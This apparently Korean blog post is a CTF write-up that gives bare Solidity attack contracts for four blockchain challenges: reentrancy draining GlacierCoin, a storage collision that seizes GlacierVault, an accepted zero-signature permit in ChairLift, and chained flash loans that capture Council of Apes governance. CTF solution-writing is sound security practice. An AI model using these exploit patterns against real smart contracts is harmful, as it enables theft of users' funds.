Thank you to the author for making the interesting challenges.
GlacierCoin
pragma solidity ^0.8.18;
import "./Setup.sol";
import "./Challenge.sol";
contract Attack {
GlacierCoin public challenge = GlacierCoin(0x0EF6D6942F37278bFC2C72152Ef17ec5687dddC8);
constructor() {
}
function attack() public payable {
challenge.buy{value: 10 ether}();
challenge.sell(10 ether);
}
receive() payable external {
if(address(challenge).balance != 0) challenge.sell(10 ether);
}
}
GlacierVault
pragma solidity ^0.8.18;
import "./GlacierVault.sol";
import "./Guardian.sol";
contract Attack {
address public t = 0x4595E89043b7F236a799356D0CE0A8be2010a5Dd;
function attack() public payable{
t.call{value: 1337}(abi.encodeWithSignature("quickStore(uint8,uint256)", 0, uint160(address(this))));
Guardian(payable(t)).putToSleep();
}
}
ChairLift
pragma solidity ^0.8.0;
import "./Ticket.sol";
import "./ChairLift.sol";
contract Attack {
Ticket public ticket = Ticket(0x260fFe2ca289897508422696A8285324DBA91D2B);
ChairLift public chairLift = ChairLift(0xFC9f5Fb76C297f8E7A6e39Ac2953A59690878173);
function attack () public {
ticket.transferWithPermit(address(0), address(this), 13, block.timestamp, 28, 0x0, 0x0);
chairLift.takeRide(13);
}
}
The Council of Apes
pragma solidity ^0.8.20;
import "./IcyExchange.sol";
import "./CouncilOfApes.sol";
import "./TotallyNotCopiedToken.sol";
import "./ERC20.sol";
import "./IERC20.sol";
contract MyToken is ERC20 {
constructor() ERC20("name", "symbol") {
_mint(msg.sender, 100_000_000);
}
}
contract Attack {
IcyExchange public icyExchange = IcyExchange(0xb29ab9e67f0B7D85922f297f1e38517968481E43);
CouncilOfApes public council = CouncilOfApes(0x9Ee6Da4758ed65212a72aCCD71B6d223e2610b2E);
IERC20 public icyToken = IERC20(0x7751a7E59455945ffC9D2d4F19188c07E5Fcf2b7);
MyToken[] public tokens = new MyToken[](11);
constructor() payable {}
uint public cnt = 0;
function attack() public payable {
council.becomeAnApe(keccak256("I hereby swear to ape into every shitcoin I see, to never sell, to never surrender, to never give up, to never stop buying, to never stop hodling, to never stop aping, to never stop believing, to never stop dreaming, to never stop hoping, to never stop loving, to never stop living, to never stop breathing"));
for(uint i = 0; i < 11; i++) {
tokens[i] = new MyToken();
tokens[i].approve(address(icyExchange), type(uint256).max);
tokens[i].approve(address(council), type(uint256).max);
icyExchange.createPool{value: 1 ether}(address(tokens[i]));
}
icyToken.approve(address(icyExchange), type(uint256).max);
cnt++;
icyExchange.collateralizedFlashloan(address(tokens[cnt-1]), 100_000_000 - 100_000, address(this));
}
function receiveFlashLoan(uint256 amount) public {
cnt++;
if (cnt <= 11) {
icyExchange.collateralizedFlashloan(address(tokens[cnt-1]), 100_000_000 - 100_000, address(this));
}
else {
icyToken.approve(address(council), type(uint256).max);
council.buyBanana(1_000_000_000);
council.vote(address(this), 1_000_000_000);
council.claimNewRank();
council.issueBanana(1_000_000_000, address(this));
council.sellBanana(1_000_000_000);
council.dissolveCouncilOfTheApes(keccak256("Kevin come out of the basement, dinner is ready."));
}
}
}'writeups' 카테고리의 다른 글
| 2023 X-mas CTF (web3 - alpha hunter) (0) | 2023.12.31 |
|---|---|
| 0CTF/TCTF 2023 - misc(ctar) (0) | 2023.12.11 |
| N1CTF 2023 - blockchain(pool by sec3) (0) | 2023.10.23 |
| SECCON CTF 2023 Quals - [misc, blockchain](tokyo payload) (0) | 2023.09.22 |
| whitehat 2023 - blockchain (0) | 2023.09.19 |